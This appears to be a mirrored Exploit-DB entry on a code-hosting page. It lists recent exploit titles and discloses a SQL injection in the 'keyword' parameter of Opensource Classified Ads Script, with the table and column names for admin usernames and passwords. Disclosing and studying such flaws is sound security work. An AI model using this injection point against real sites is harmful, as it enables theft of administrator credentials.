bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/platforms/php/webapps/41758.txt
Offensive Security 8e03027ae5 DB: 2017-03-30 
18 new exploits

FUSE fusermount Tool - Race Condition
Linux Kernel (Ubuntu 11.10/12.04) - binfmt_script Stack Data Disclosure
Apache 2.2 - Scoreboard Invalid Free On Shutdown
Apache < 2.0.64  / < 2.2.21 mod_setenvif - Integer Overflow

FUSE fusermount Tool - Race Condition
Ubuntu < 15.10 - PT Chown Arbitrary PTs Access Via UserNamespace Privilege Escalation
AUFS (Ubuntu 15.10) - 'allow_userns' Fuse/Xattr User Namespaces Privilege Escalation
Ubuntu 14.04/15.10 - User Namespace Overlayfs Xattr Setgid Privilege Escalation
Ubuntu 15.10 - 'USERNS ' Overlayfs Over Fuse Privilege Escalation
NTP - Privilege Escalation
Ubuntu 15.04 (Dev) - 'Upstart' Logrotation Privilege Escalation
Vm86 - Syscall Task Switch Kernel Panic / Privilege Escalation
Disk Sorter Enterprise 9.5.12 - 'Import Command' Buffer Overflow
DiskBoss Enterprise 7.8.16 - 'Import Command' Buffer Overflow
Sync Breeze Enterprise 9.5.16 - 'Import Command' Buffer Overflow

Sync Breeze Enterprise 9.5.16 - 'GET' Buffer Overflow (SEH)

Linux/x86 - execve(/bin/sh_) Shellcode (19 bytes)

Just Dial Clone Script - 'fid' SQL Injection
Just Dial Clone Script - 'fid' Parameter SQL Injection

Just Dial Clone Script - 'srch' SQL Injection
Just Dial Clone Script - 'srch' Parameter SQL Injection
Opensource Classified Ads Script - 'keyword' Parameter SQL Injection
EyesOfNetwork (EON) 5.1 - SQL Injection
2017-03-30 05:01:15 +00:00

24 lines
No EOL
777 B
Text
Executable file
Raw Blame History

# # # # #
# Exploit Title: Opensource Classified Ads Script - SQL Injection
# Google Dork: N/A
# Date: 29.03.2017
# Vendor Homepage: http://www.2daybiz.com/
# Software: http://www.professionalclassifiedscript.com/downloads/opensource-classified-ads-script-2/
# Demo: http://198.38.86.159/~classic/
# Version: N/A
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# #ihsansencan
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/advance_result.php?keyword=[SQL]&adv_search
# class_2daydiscount :d_hotlisting
# class_admin :adm_id
# class_admin :adm_username
# class_admin :adm_password
# class_admin :adm_lastvisit
# class_category :c_id
# # # # #
Reference in a new issue View git blame Copy permalink